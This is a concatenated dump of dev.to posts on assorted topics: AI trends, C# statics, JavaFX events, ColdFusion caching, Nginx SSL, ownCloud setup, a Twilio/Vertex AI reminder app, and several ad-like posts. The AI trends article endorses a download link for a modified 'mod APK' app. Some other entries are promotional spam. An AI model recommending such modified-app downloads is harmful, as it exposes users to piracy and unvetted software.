📣📣Drive innovation with intelligent AI and secure blockchain technology! Check
out how we can help your business grow!
[Blockchain App Development](https://www.rapidinnovation.io/service-
development/blockchain-app-development-company-in-usa)
[Blockchain App Development](https://www.rapidinnovation.io/service-
development/blockchain-app-development-company-in-usa)
[AI Software Development](https://www.rapidinnovation.io/ai-software-
development-company-in-usa)
[AI Software Development](https://www.rapidinnovation.io/ai-software-
development-company-in-usa)
## URLs
* <https://www.rapidinnovation.io/post/the-importance-of-centralized-exchange-development>
## Hashtags
#CryptoExchanges
#BlockchainTechnology
#CryptoTrading
#CentralizedExchanges
#CryptoInnovation
| rapidinnovation | |
1,899,301 | AI Trends in 2024: Revolutionizing the Workforce | Artificial Intelligence (AI) is reshaping industries at an unprecedented pace. As we step into 2024,... | 0 | 2024-06-24T19:24:00 | https://dev.to/trentbolt/ai-trends-in-2024-revolutionizing-the-workforce-14p0 | ai, aiops, photoshop, webdev | Artificial Intelligence (AI) is reshaping industries at an unprecedented pace. As we step into 2024, AI's capabilities are expanding, making significant inroads into various sectors. Among the most impactful areas are content creation, video and photo editing, graphic design, and more. This evolution raises questions about which jobs AI might replace and how it can streamline work processes. In this article, we'll explore these AI trends, highlighting examples like Remini, which can enhance and restore images in just a minute.
## **AI in Content Creation**
Content creation is one of the most dynamic fields AI is transforming. AI-powered tools can generate written content, edit texts, and even create engaging stories. These tools use natural language processing (NLP) to understand and mimic human writing styles. For instance, platforms like OpenAI's GPT-4 can write articles, reports, and even poetry, with human-like fluency.
Examples:
Jasper: An AI writing assistant that helps marketers, bloggers, and businesses create content faster by generating ideas, drafting content, and even optimizing for SEO.
Copy.ai: Another AI-driven tool that generates marketing copy, social media posts, and blog content, allowing writers to focus more on strategy and creativity.
AI in Video and Photo Editing
AI is revolutionizing video and photo editing, making these processes faster and more efficient. AI algorithms can now automatically edit videos, enhance photo quality, and even restore old or damaged images. This is particularly beneficial for professionals who need to produce high-quality content quickly.
Examples:
Adobe Sensei: Integrated into Adobe's suite of products, this AI technology helps automate repetitive tasks like tagging photos, editing videos, and enhancing image quality.
Descript: A video editing tool that uses AI to transcribe, edit, and produce videos efficiently. It allows users to edit videos as easily as editing text.
AI in Graphic Design
Graphic design is another field where AI is making significant strides. AI-powered design tools can create layouts, choose color schemes, and even design logos. These tools leverage machine learning to understand design principles and apply them creatively.
Examples:
Canva: While primarily a user-friendly design tool, Canva uses AI to suggest design elements, create templates, and enhance user-generated designs.
Designs.ai: An AI-powered design suite that helps users create logos, videos, banners, and mockups quickly, using AI to generate design options based on user input.
Job Displacement and Transformation
The integration of AI into these creative fields raises concerns about job displacement. While AI can handle many tasks traditionally done by humans, it also transforms the nature of these jobs rather than eliminating them entirely.
### Jobs AI Might Replace
Basic Content Writers: AI tools can generate standard articles, news reports, and marketing copy, potentially replacing entry-level writing jobs.
Junior Graphic Designers: Tasks such as creating basic logos, simple layouts, and routine graphic work can be automated, reducing the need for junior designers.
Video Editors: Basic editing tasks, like trimming footage, adding effects, and generating captions, can be automated, impacting entry-level positions.
### Jobs Transformed by AI
Content Strategists: As AI handles routine writing tasks, human writers can focus on strategy, creativity, and storytelling, enhancing the quality and impact of content.
Senior Graphic Designers: With AI handling repetitive tasks, designers can focus on complex projects, innovative designs, and creative direction.
Video Producers: AI allows video producers to streamline their workflow, focus on creative aspects, and manage larger projects with the same resources.
### Streamlining Work with AI
AI not only replaces certain jobs but also streamlines many work processes, making them more efficient and productive. This leads to significant time and cost savings for businesses and opens up new opportunities for professionals to upskill and adapt to new roles.
### Content Writing

AI-driven tools like Grammarly not only correct grammar and spelling but also offer style suggestions, tone adjustments, and readability improvements. This enables writers to produce polished content quickly.
Example:
Grammarly: An AI-powered writing assistant that helps users with grammar, punctuation, style suggestions, and even tone detection, making writing more efficient.
### _Photo and Video Editing_

AI tools like Remini have made significant advancements in photo and video editing. Remini uses advanced AI algorithms to enhance image quality, restore old photos, and improve video resolution, all within minutes.
Example:
Remini: An AI-powered app that enhances image quality and restores old photos. With just a few clicks, users can transform blurry or damaged photos into clear, high-resolution images. I personally use [this app for my photo enhancements](https://modyedge.com/remini-mod-apk/) It is quite good.
### Graphic Designing
AI design tools can automatically generate design elements, suggest layouts, and even adapt designs to different formats. This allows designers to focus on creativity and innovation rather than repetitive tasks.
Example:
Canva: Uses AI to suggest templates, color palettes, and design elements, enabling users to create professional designs quickly and easily.
The Future of Work with AI
As AI continues to evolve, its impact on the workforce will become even more profound. While some jobs may be replaced, many will be transformed, creating new opportunities for those willing to adapt. Professionals in creative fields must embrace AI as a tool that enhances their capabilities, allowing them to focus on higher-level tasks and creative endeavors.
### Embracing AI in the Workforce

To thrive in an AI-driven world, professionals need to:
Upskill: Continuously learn new skills that complement AI technologies.
Adapt: Be flexible and open to new roles and ways of working.
Innovate: Use AI as a tool to enhance creativity and innovation in their work.
#### **Conclusion**
AI trends in 2024 are set to revolutionize various industries, especially in content creation, video and photo editing, and graphic design. While AI may replace some jobs, it also transforms and streamlines many work processes, offering new opportunities for those willing to adapt. By embracing AI and leveraging its capabilities, professionals can enhance their productivity, creativity, and impact in their respective fields.
| trentbolt |
1,800,129 | isro | https://aleksandarhaber.com/tutorial-on-simple-position-controller-for-differential-drive-robot-with-... | 0 | 2024-06-24T19:22:53 | https://dev.to/bridgesgap/isro-3l3d | https://aleksandarhaber.com/tutorial-on-simple-position-controller-for-differential-drive-robot-with-simulation-and-animation-in-python/
https://github.com/HariomTiwari404/chandrayaan3?trk=article-ssr-frontend-pulse_little-text-block
https://github.com/mihir-m-gandhi/Basic-Traffic-Intersection-Simulation
https://www.youtube.com/watch?v=GRBQRneYT0s
https://github.com/YouMakeTech/RobotArm
https://github.com/mourra950/Rover_Sim
https://github.com/ashutoshtiwari13/Hands-on-DeepRL-and-DL
https://gamedevacademy.org/pygame-3d-tutorial-complete-guide/
https://www.youtube.com/watch?v=eJDIsFJN4OQ
https://github.com/ashutoshtiwari13/RoverWorld-perception-Control
https://github.com/StanislavPetrovV/3D-Graphics-Engine/ | bridgesgap | |
1,899,300 | Static in C# - Part 2 | In a previous article, I wrote about static definition, now we will go deeply - where, when and how... | 27,809 | 2024-06-24T19:22:31 | https://www.linkedin.com/pulse/static-c-sharp-part-2-loc-nguyen-pixnc/ | csharp, beginners, programming | In a [previous article](https://dev.to/locnguyenpv/static-in-c-part-1-51h1), I wrote about static definition, now we will go deeply - where, when and how to use it.
## Where can use `static`?
We can use it in following items:
- Variable
- Field
- Method
- Function
- Class
- Constructor
Take a look at the example below to get more info
### Static function

In the following picture, we can include some things:
- With **variable**:
- **Global**: require `static` type
- **Local**: not require `static` type
- It can be call by other function (**static / non-static**)
- It can't call other **non-static** function
### Static class

When we apply static to class, **everything of class (even the constructor)**, I repeat **everything** must be static
### Static constructor

Some things we can take notes on here:
- Can use for both **static / non-static** class
- Don't have parameter
- Will be call when the class is accessed for the first time.
- With **non-static class**, it can have **both two types of constructor**
## Best Practise
In my opinion, I usually use `static` in two cases:
- **Utility** (useful function I write for myself - ex: GetValueByKey, GetNameByStatus)
- Extension method (extend function for specific class - ex: GetUserId)
### Example - Utility

Here is the utility function I use to get value in `web.config`, when I want get any value in config file, just call

### Example - Extension
Here are some extension method I wrote for `ASP.NET Identity`

For a short explanation, two methods above would return **Access Level** and **Product Segment** in User Claims. It can be used like build-in function for `Identity`

**P/s:** The pain point of `static` type is management. It declare one at run time and exists until the program finish, it can make exceptions if we don't manage access carefully. That's why **Singleton pattern** was born to cure it.
| locnguyenpv |
1,899,246 | Events and Event Sources | An event is an object created from an event source. Firing an event means to create an event and... | 0 | 2024-06-24T19:18:08 | https://dev.to/paulike/events-and-event-sources-4ihi | java, programming, learning, beginners | An event is an object created from an event source. Firing an event means to create an event and delegate the handler to handle the event.
When you run a Java GUI program, the program interacts with the user, and the events drive its execution. This is called _event-driven programming_. An _event_ can be defined as a signal to the program that something has happened. Events are triggered by external user actions, such as mouse movements, mouse clicks, and keystrokes. The program can choose to respond to or ignore an event. The example in the preceding section gave you a taste of event-driven programming.
The component that creates an event and fires it is called the _event source_ object, or simply _source object_ or _source component_. For example, a button is the source object for a buttonclicking action event. An event is an instance of an event class. The root class of the Java event classes is **java.util.EventObject**. The root class of the JavaFX event classes is **javafx.event.Event**. The hierarchical relationships of some event classes are shown in Figure below.

An _event object_ contains whatever properties are pertinent to the event. You can identify the source object of an event using the **getSource()** instance method in the **EventObject** class. The subclasses of **EventObject** deal with specific types of events, such as action events, window events, mouse events, and key events. The first three columns in Table below list some external user actions, source objects, and event types fired. For example, when clicking a button, the button creates and fires an **ActionEvent**, as indicated in the first line of this table. Here, the button is an event source object, and an **ActionEvent** is the event object fired by the source object, as shown in Figure below.


If a component can fire an event, any subclass of the component can fire the same type of event. For example, every JavaFX shape, layout pane, and control can fire **MouseEvent** and **KeyEvent** since **Node** is the superclass for shapes, layout panes, and controls. | paulike |
1,899,245 | TempCache ColdFusion UDF | There's been many occasions where a user-specific payload has been generated (shopping cart, check... | 0 | 2024-06-24T19:17:20 | https://dev.to/gamesover/tempcache-coldfusion-udf-32f9 | coldfusion | There's been many occasions where a user-specific payload has been generated (shopping cart, check out, config settings, processing results) and the user needs to be directed to a new destination with the data, but I want to avoid non-securely passing data as URL or form parameters or having to enable and/or leverage session variables.
We've encountered issues where the content could be blocked due to complex WAF rules that are beyond our editable control... especially if there's anything that resembles HTML or contains certain sequences. There's also abuse issues as automated software can scan the form, fuzz the parameters in order to blindly auto-post to the final script. We experienced this in the form of [carding](https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-001_Carding) (aka credit card stuffing) on some non-profit donation forms.
To prevent abuse, we've added [hCaptcha](https://www.hcaptcha.com/), [CSRF](https://owasp.org/www-community/attacks/csrf), fingerprinting, IP reputation and some other countermeasures, but there's been some sophisticated abuses where everything (remote IP, form payload, browser) is completely different, but it's obvious that it's the same abuser due to the automated schedule and occurrence of failures.
The most impactful workflow has been to:
- display a verification page
- Create an object with data unique to the order (IP, email, total amount) , temporarily cache it server-side and generate a token to add to the form
- Upon submission, and prior to performing any transaction, use the UUID to perform a look-up of cached data. If the look-up data doesn't exist or doesn't match the form/CGI data, reject the attempt.
- Added bonus: If no cached data exists, sleep for a second or two and then return a bogus "credit card is invalid" message.
We've also used this script on Contact & "Thank you" pages. On some older applications, the response is displayed on the same page without redirecting or using `history.pushState(null, null, "/myUrl");` to prevent accidental POST resubmission, but some app-based browsers seem to be blindly retriggering the form post when reopening the app. We haven't been able to determine the actual cause, but capturing the response message, adding it to an object, caching and redirecting to a new page with the UUID to display the content has prevented the form report/replay issues from reoccurring.
Here's the TempCache UDF. A simple cfml example has been included:
https://gist.github.com/JamoCA/fd43c189379196b6a52884affea3ad51
## Source code
{% gist https://gist.github.com/JamoCA/fd43c189379196b6a52884affea3ad51 %}
| gamesover |
1,899,244 | Feel energetic the whole day with Workday Nutrition's Energy Powder | "Feeling like your afternoons are a snooze fest? Don't let fatigue drag you down! Workday... | 0 | 2024-06-24T19:13:53 | https://dev.to/rohit_sharma_3e656f12942e/feel-energetic-the-whole-day-with-workday-nutritions-energy-powder-1a68 | "Feeling like your afternoons are a snooze fest? Don't let fatigue drag you down!
Workday Nutrition's [Energy Powder](https://workdaynutrition.com/product/better-morning-subscription-test/?utm_source=organic&utm_medium=SEO&utm_campaign=Backlink) is your secret weapon for sustained, all-day energy. Our delicious, easy-to-mix powder is packed with:
Natural ingredients: No jitters, just a clean and healthy boost.
Essential vitamins: Support your body's natural energy production.
Zero sugar: Avoid the crash and experience long-lasting focus.
Simply mix it with water, and get ready to tackle your to-do list with renewed . Workday Nutrition's Energy Powder is perfect for:
Busy professionals
Students on the go
Athletes seeking a natural edge
Don't settle for sluggish afternoons! Take control of your energy with Workday Nutrition. Visit our website." | rohit_sharma_3e656f12942e | |
1,899,243 | NaN is neither greater than nor less than any value | Have you ever been in a situation where you're expecting something and you get something unexpected... | 27,846 | 2024-06-24T19:13:15 | https://dev.to/abhinavkushagra/nan-is-neither-greater-than-mot-less-than-any-value-1n35 | javascript, webdev, beginners, programming | Have you ever been in a situation where you're expecting something and you get something unexpected in return?
Well, I'm not talking about "the mysteries of life" but "the mysteries of Javascript".
Consider we've something like this below:
```javascript
let x = 9;
let y = "11";
let z = "14";
```
```javascript
x < y; // true
y < z; // true
z < x; // false
```
`x < y`
So, what's exactly happening here is, if either of the values or both are strings i.e, when x < y, then both the values are coerced to be numbers and a typical numerical comparison happens.
`y < z`
But if both the values in the < comparison are strings, the comparison is made lexicographically same as the order you find in any dictionary.
Let's look at another case when one of the values can't be made into a valid number.
```javascript
let x = 11;
let y = 'z';
```
```javascript
x < y; // false
x > y; // false
x == y; // false
```
Most of us should be confused, how all the three comparisons be false? but it's okay to be confused here. The thing to catch here is value y is being coerced to 'Not a Number' (NaN) in the equality comparisons and **NaN is neither greater than nor less than any other value**.
Ref: YDKJS
| abhinavkushagra |
1,899,242 | Event-Driven Programming | You can write code to process events such as a button click, mouse movement, and keystrokes.... | 0 | 2024-06-24T19:09:27 | https://dev.to/paulike/event-driven-programming-2g88 | java, programming, learning, beginners | You can write code to process events such as a button click, mouse movement, and keystrokes.
Suppose you wish to write a GUI program that lets the user enter a loan amount, annual interest rate, and number of years and click the _Calculate_ button to obtain the monthly payment and total payment, as shown in Figure below. How do you accomplish the task? You have to use _event-driven programming_ to write the code to respond to the button-clicking event.

Before delving into event-driven programming, it is helpful to get a taste using a simple example. The example displays two buttons in a pane, as shown in Figure below.

(a) The program displays two buttons. (b) A message is displayed in the
console when a button is clicked.
To respond to a button click, you need to write the code to process the button-clicking action. The button is an _event source object_—where the action originates. You need to create an object capable of handling the action event on a button. This object is called an _event handler_, as shown in Figure below.

Not all objects can be handlers for an action event. To be a handler of an action event, two
requirements must be met:
1. The object must be an instance of the **EventHandler<T extends Event>** interface. This interface defines the common behavior for all handlers. **<T extends Event>** denotes that **T** is a generic type that is a subtype of **Event**.
2. The **EventHandler** object **handler** must be registered with the event source object using the method **source.setOnAction(handler)**.
The **EventHandler<ActionEvent>** interface contains the **handle(ActionEvent)** method for processing the action event. Your handler class must override this method to respond to the event. Listing 15.1 gives the code that processes the **ActionEvent** on the two buttons. When you click the _OK_ button, the message “OK button clicked” is displayed. When you click the _Cancel_ button, the message “Cancel button clicked” is displayed, as shown in Figure above (a) and (b).
```
package application;
import javafx.application.Application;
import javafx.geometry.Pos;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.layout.HBox;
import javafx.stage.Stage;
import javafx.event.ActionEvent;
import javafx.event.EventHandler;
public class HandleEvent extends Application {
@Override // Override the start method in the Application
public void start(Stage primaryStage) {
// Create a pane and set its properties
HBox pane = new HBox(10);
pane.setAlignment(Pos.CENTER);
Button btOK = new Button("OK");
Button btCancel = new Button("Cancel");
OKHandlerClass handler1 = new OKHandlerClass();
btOK.setOnAction(handler1);
CancelHandlerClass handler2 = new CancelHandlerClass();
btCancel.setOnAction(handler2);
pane.getChildren().addAll(btOK, btCancel);
// Create a scene and place it in the stage
Scene scene = new Scene(pane);
primaryStage.setTitle("HandleEvent"); // Set the stage title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
}
public static void main(String[] args) {
Application.launch(args);
}
}
class OKHandlerClass implements EventHandler<ActionEvent>{
@Override
public void handle(ActionEvent e) {
System.out.println("OK button clicked");
}
}
class CancelHandlerClass implements EventHandler<ActionEvent>{
@Override
public void handle(ActionEvent e) {
System.out.println("Cancel button clicked");
}
}
```
Two handler classes are defined in lines 37–42. Each handler class implements **EventHandler<ActionEvent>** to process **ActionEvent**. The object **handler1** is an instance of **OKHandlerClass** (line 19), which is registered with the button **btOK** (line 20). When the _OK_ button is clicked, the **handle(ActionEvent)** method (line 39) in **OKHandlerClass** is invoked to process the event. The object **handler2** is an instance of **CancelHandlerClass** (line 21), which is registered with the button **btCancel** in line 22. When the _Cancel_ button is clicked, the **handle(ActionEvent)** method (line 46) in **CancelHandlerClass** is invoked to process the event.
You now have seen a glimpse of event-driven programming in JavaFX. | paulike |
1,899,241 | How to Install Let’s Encrypt SSL Certificate with Nginx on Ubuntu 22.04 | Prerequisites Before you begin, ensure you have: An NVMe VPS from EcoStack Cloud running... | 0 | 2024-06-24T19:01:55 | https://dev.to/ersinkoc/how-to-install-lets-encrypt-ssl-certificate-with-nginx-on-ubuntu-2204-1fog | ssl, nginx, vps | #### Prerequisites
Before you begin, ensure you have:
- An NVMe VPS from [EcoStack Cloud](https://ecostack.cloud) running Ubuntu 22.04.
- Nginx installed and running.
- A domain name pointed to your server’s IP address.
- Sudo privileges on your server.
#### Step 1: Install Certbot and Nginx Plugin
Certbot is a tool to automate the installation of Let’s Encrypt SSL certificates. Install Certbot and its Nginx plugin using the following commands:
```bash
sudo apt update
sudo apt install certbot python3-certbot-nginx -y
```
#### Step 2: Verify Nginx Configuration
Ensure that Nginx is correctly installed and running. You can check the status of Nginx with:
```bash
sudo systemctl status nginx
```
Make sure that your domain is properly configured in Nginx. If not, you can create or modify your site configuration in `/etc/nginx/sites-available/`.
For example, you can create a basic configuration file:
```bash
sudo nano /etc/nginx/sites-available/your_domain
```
Replace `your_domain` with your actual domain name and add the following configuration:
```nginx
server {
listen 80;
server_name your_domain www.your_domain;
root /var/www/your_domain;
index index.html index.htm index.nginx-debian.html;
location / {
try_files $uri $uri/ =404;
}
}
```
Create a symbolic link to enable the site:
```bash
sudo ln -s /etc/nginx/sites-available/your_domain /etc/nginx/sites-enabled/
```
Test the configuration to make sure there are no syntax errors:
```bash
sudo nginx -t
```
Then reload Nginx to apply the changes:
```bash
sudo systemctl reload nginx
```
#### Step 3: Obtain an SSL Certificate
Use Certbot to obtain an SSL certificate for your domain. Certbot will automatically update your Nginx configuration to use the SSL certificate.
```bash
sudo certbot --nginx -d your_domain -d www.your_domain
```
Replace `your_domain` with your actual domain name. Follow the prompts to complete the setup.
During this process, Certbot will:
- Verify your domain.
- Download and install the SSL certificate.
- Configure Nginx to use the certificate.
- Reload Nginx to apply the changes.
#### Step 4: Verify SSL Installation
Once the installation is complete, you can verify the SSL certificate by visiting your domain in a web browser. Use `https://your_domain` to ensure that the SSL certificate is active and the connection is secure.
You can also use SSL Labs' SSL Test tool to check the certificate’s details and security grade.
#### Step 5: Set Up Auto-Renewal
Let’s Encrypt certificates are valid for 90 days. To ensure that your certificate is automatically renewed, Certbot creates a cron job to handle this.
You can test the auto-renewal process with:
```bash
sudo certbot renew --dry-run
```
This command simulates the renewal process without making any actual changes. If there are no errors, the auto-renewal is set up correctly.
#### Conclusion
You have successfully installed a Let’s Encrypt SSL certificate with Nginx on Ubuntu 22.04, provided by [EcoStack Cloud](https://ecostack.cloud). Your website is now secured with HTTPS, ensuring encrypted communication and enhanced trust with your visitors.
For further information and advanced configurations, refer to the [official Certbot documentation](https://certbot.eff.org/docs/) and [Nginx documentation](https://nginx.org/en/docs/).
| ersinkoc |
1,899,239 | Holo Button | Press and hold to display the icon as a hologram! | 0 | 2024-06-24T18:58:40 | https://dev.to/__92e9767cb3185/holo-button-4a0b | codepen | [](url)Press and hold to display the icon as a hologram!
{% codepen https://codepen.io/tbpghvoq-the-sans/pen/NWVzqOK %} | __92e9767cb3185 |
1,899,238 | How to Install and Configure ownCloud on CentOS 9 Stream | Prerequisites Before starting the installation, make sure you have: A KVM-based NVMe VPS... | 0 | 2024-06-24T18:54:01 | https://dev.to/ersinkoc/how-to-install-and-configure-owncloud-on-centos-9-stream-470k | owncloud, selfhosted, vps | #### Prerequisites
Before starting the installation, make sure you have:
- A KVM-based NVMe VPS from [EcoStack Cloud](https://ecostack.cloud) running CentOS 9 Stream.
- A user account with sudo privileges.
#### Step 1: Update the System
Start by updating your system to ensure all packages are current.
```bash
sudo dnf update -y
```
#### Step 2: Install Required Packages
Install the necessary packages for running ownCloud. These include Apache, MariaDB, PHP, and additional modules.
```bash
sudo dnf install httpd mariadb-server mariadb php php-mysqlnd php-xml php-json php-mbstring php-gd php-curl php-intl php-zip wget unzip -y
```
#### Step 3: Start and Enable Apache and MariaDB
Enable and start the Apache and MariaDB services.
```bash
sudo systemctl start httpd
sudo systemctl enable httpd
sudo systemctl start mariadb
sudo systemctl enable mariadb
```
#### Step 4: Secure MariaDB Installation
Run the security script to set up a root password and secure your MariaDB installation.
```bash
sudo mysql_secure_installation
```
Follow the prompts to set the root password and remove anonymous users, disallow root login remotely, and remove the test database.
#### Step 5: Create a Database for ownCloud
Log in to MariaDB and create a database and user for ownCloud.
```bash
sudo mysql -u root -p
```
In the MariaDB shell, execute the following commands:
```sql
CREATE DATABASE owncloud;
CREATE USER 'ownclouduser'@'localhost' IDENTIFIED BY 'your_password';
GRANT ALL PRIVILEGES ON owncloud.* TO 'ownclouduser'@'localhost';
FLUSH PRIVILEGES;
EXIT;
```
Replace `your_password` with a strong password.
#### Step 6: Download and Install ownCloud
Download the latest version of ownCloud from its official website.
```bash
wget https://download.owncloud.org/community/owncloud-complete-latest.zip
```
Extract the downloaded archive and move it to the Apache web root directory.
```bash
unzip owncloud-complete-latest.zip
sudo mv owncloud /var/www/html/
```
#### Step 7: Set Permissions
Set the appropriate permissions to ensure ownCloud can read and write to its files and directories.
```bash
sudo chown -R apache:apache /var/www/html/owncloud/
sudo chmod -R 755 /var/www/html/owncloud/
```
#### Step 8: Configure Apache for ownCloud
Create a new Apache configuration file for ownCloud.
```bash
sudo nano /etc/httpd/conf.d/owncloud.conf
```
Add the following configuration:
```apache
<VirtualHost *:80>
DocumentRoot "/var/www/html/owncloud"
ServerName your_server_ip_or_domain
<Directory "/var/www/html/owncloud">
AllowOverride All
Require all granted
</Directory>
ErrorLog /var/log/httpd/owncloud-error_log
CustomLog /var/log/httpd/owncloud-access_log combined
</VirtualHost>
```
Replace `your_server_ip_or_domain` with your server’s IP address or domain name. Save and close the file.
#### Step 9: Adjust Firewall Settings
Allow HTTP traffic through the firewall.
```bash
sudo firewall-cmd --permanent --add-service=http
sudo firewall-cmd --reload
```
#### Step 10: Restart Apache
Restart Apache to apply the changes.
```bash
sudo systemctl restart httpd
```
#### Step 11: Complete the Installation via Web Browser
Open your web browser and navigate to `http://your_server_ip_or_domain/owncloud`. You will see the ownCloud setup page.
- Create an admin account by filling in the required details.
- Enter the database details:
- Database user: `ownclouduser`
- Database password: The password you set earlier
- Database name: `owncloud`
- Database host: `localhost`
Click "Finish Setup" to complete the installation.
---
### Conclusion
You have successfully installed and configured ownCloud on CentOS 9 Stream with [EcoStack Cloud](https://ecostack.cloud). You can now use your own cloud storage solution to manage and share your files securely.
For more details and advanced configurations, check out the [official ownCloud documentation](https://doc.owncloud.com/server/admin_manual/).
| ersinkoc |
1,899,237 | Building Fintech Payment Solutions with Java | Introduction to Fintech Payment Systems Developing fintech payment systems requires a robust, secure,... | 0 | 2024-06-24T18:52:02 | https://dev.to/twinkle123/building-fintech-payment-solutions-with-java-2dg0 | javascript, tutorial, fintech, java | Introduction to Fintech Payment Systems Developing fintech payment systems requires a robust, secure, and scalable approach to handle financial transactions efficiently. Java, with its platform independence and extensive libraries, is a prime choice for this task.
Why Choose Java for Fintech? Java provides several benefits:
1. Security: Java's built-in security features are critical for protecting financial data.
2. Scalability: It supports scalable solutions, handling a growing user base and increasing transaction volumes.
3. Cross-platform Compatibility: Java applications run on various platforms without modification.
Key Steps in Development
1. Requirement Analysis: Understand the specific needs of the payment system, including security, transaction volume, and user interface requirements.
2. Designing Architecture: Plan a modular and scalable architecture that can handle the load and ensure data security.
3. Implementing Security Measures: Use Java's security APIs to implement encryption, secure communication, and user authentication.
4. Developing Core Modules: Code the core functionalities such as transaction processing, user management, and reporting using Java frameworks.
5. Testing and Quality Assurance: Perform rigorous testing to identify and fix vulnerabilities and ensure the system's reliability.
6. Deployment and Maintenance: Deploy the system in a controlled environment and provide ongoing support to address any issues and implement updates.
Case Study: Peer-to-Peer Payment Platform A detailed case study illustrates the implementation of a peer-to-peer payment platform using Java. Key aspects include:
• User Authentication: Implementing secure login mechanisms and user verification.
• Transaction Management: Ensuring accurate and efficient processing of transactions.
• Integration with Banking Systems: Facilitating seamless integration with existing banking infrastructure.
Conclusion Java's capabilities make it an ideal choice for developing fintech payment systems. Its security features, scalability, and cross-platform support ensure that the resulting systems are robust and efficient.
| twinkle123 |
1,899,236 | Convenient Visa Services in Mumbai | Explore seamless visa processing and passport management at Mumbai Visa Application Center or visa... | 0 | 2024-06-24T18:51:38 | https://dev.to/pooja_girase_d01a682beb88/convenient-visa-services-in-mumbai-47f6 | Explore seamless visa processing and passport management at Mumbai Visa Application Center or [visa agents in Mumbai](https://thailandvisacentermumbai.dudigitalglobal.com/contact-us/), located in Prathamesh Tower-B, Lower Parel. Expert services from Monday to Saturday. Contact +91-7289000071 or visit us online for more details. #VisaServices #Mumbai | pooja_girase_d01a682beb88 | |
1,256,592 | Java: The WHORE Without The H | After a hard fast thrust, comes Sun's 1995 release, Java. People's love for Java is abound. This is... | 0 | 2024-06-24T18:37:24 | https://dev.to/one/java-the-whore-without-the-h-4c0n | java, programming, oop | After a hard fast thrust, comes Sun's 1995 release, Java. People's love for Java is abound. This is because of the Java Virtual Machine, which ensures the same Java code can be run on different operating systems and platforms. This made Sun Microsystems’ slogan for Java was “Write Once, Run Everywhere”. The WhORE,
Java, runs on different platforms, but programmers write it the same way.
## Which other programming language is a WORE? | one |
1,897,338 | 'memba?: Twilio & Vertex AI SMS Reminder System for Seniors who don't 'memba. | ✨ As part of dev.to Twilio AI challange me and @isitayush crafted a digital guardian angel for... | 0 | 2024-06-24T18:34:03 | https://medium.com/@richardevcom/memba-twilio-vertex-ai-reminder-system-for-seniors-who-dont-memba-466ab033bfa5 | twiliochallenge, vertex, googlecloud, reminder |

✨ As part of dev.to Twilio AI challange me and @isitayush crafted a digital guardian angel for seniors (not you... probably).
## Here's how 'memba works:
1. You simply send an SMS message to a designated Twilio phone number [+44 7822 021078](tel:+447822021078). The message should be formatted like this: `Remind me to take medicine on 24nd June 18:00`.
2. Twilio sends SMS to our Node.js/Express.js app container.
> ⚡ This app is containerized using Docker Hub and run using Google Cloud Run (hail automation).
3. The Cloud Run application forwards the SMS content to Vertex AI (Gemini LLM), with our predefined instructions.
```txt
Functionality:Parse reminder text into JSON format.
Input:The text of the reminder and/or date, time.Output:JSON string in the format: {'reminder_text': "<text>", 'reminder_datetime': "<ISO 8601 extended format>"}.
Don't include any introduction text likt "Hello...", "Remind me to...", "Please..." in reminder_text.
Error handling:If the reminder text doesn't follow the expected format (e.g., missing date/time), return an empty JSON string {}.
If the date/time is not set or can't be parsed, return an empty JSON string {}.
If reminder_text is empty or not set, return an empty JSON string {}.
If date is set, but time is not set, use current time. If time is set, but date is not set, use current date.
Don't return the JSON string as markdown.
Do not delimit the output JSON with anything.
If reminder text contains abstract date, time meanings like "tomorrow", "next week", "next month", etc. then convert them to date, time as ISO8601 extended format - for example, "tomorrow" becomes <current_date> + 1 day or "next week" becomes <current_date> + 7 days, etc.
```
4. Vertex AI then translates the extracted information into a structured JSON format like this:
```json
{
"reminder_text": "take medicine",
"reminder_datetime": "2024-06-24T18:00:00.000Z"
}
```
5. We then send the JSON out to our Cloud SQL MySQL database and store it (we chose to use Prisma in our Node.js app).
6. Then a background job (we also put it directly in our Node.js app) runs every minute. This job scans the database for reminders scheduled within the next minute.
7. For identified reminders, the job triggers an SMS notification back to the senior's phone via the Twilio API precisely at the set `reminder_datetime`.

## Demo
- Send your SMS reminder (for example, `Remind me to take medicine on 24nd June 18:00`) to [+44 7822 021078](tel:+447822021078).
> ⚡ We bravely topped up our Twilio account.
- You can also fork our solution from here: [richardevcom/memba](https://github.com/richardevcom/memba)
- Check out our landing page (yeah, because why not?): ['memba?](https://memba.my.canva.site/)
- Here is a quick demo video:
{% youtube lqeuZKZNwKk %}
## 🐞 Known issues
- Our LLM is smart enough to parse data, but not smart enough to determine correct timezone from phone nr. country code. Expect your reminders to have date/time offset.
> ⚡ Many countries have multiple timezones (did you know that France has 12 timezones? 🤯) and one phone number country code - which basically leads our solution to have date/time offsets.
 | richardevcom |
1,899,141 | Stay Updated with Python/FastAPI/Django: Weekly News Summary (17/06/2024–23/06/2024) | Dive into the latest tech buzz with this weekly news summary, focusing on Python, FastAPI, and Django... | 0 | 2024-06-24T18:30:00 | https://poovarasu.dev/python-fastapi-django-weekly-news-summary-17-06-2024-to-23-06-2024/ | python, django, flask, fastapi | Dive into the latest tech buzz with this weekly news summary, focusing on Python, FastAPI, and Django updates from June 17th to June 23rd, 2024. Stay ahead in the tech game with insights curated just for you!
This summary offers a concise overview of recent advancements in the Python/FastAPI/Django framework, providing valuable insights for developers and enthusiasts alike. Explore the full post for more in-depth coverage and stay updated on the latest in Python/FastAPI/Django development.
Check out the complete article here [https://poovarasu.dev/python-fastapi-django-weekly-news-summary-17-06-2024-to-23-06-2024/](https://poovarasu.dev/python-fastapi-django-weekly-news-summary-17-06-2024-to-23-06-2024/) | poovarasu |
1,899,377 | 100 Salesforce Integration Interview Questions and Answers | Salesforce integrations are a pivotal aspect of leveraging the full potential of Salesforce CRM to... | 0 | 2024-06-25T19:24:28 | https://www.sfapps.info/100-salesforce-integration-interview-questions-and-answers/ | blog, interviewquestions | ---
title: 100 Salesforce Integration Interview Questions and Answers
published: true
date: 2024-06-24 18:23:36 UTC
tags: Blog,InterviewQuestions
canonical_url: https://www.sfapps.info/100-salesforce-integration-interview-questions-and-answers/
---
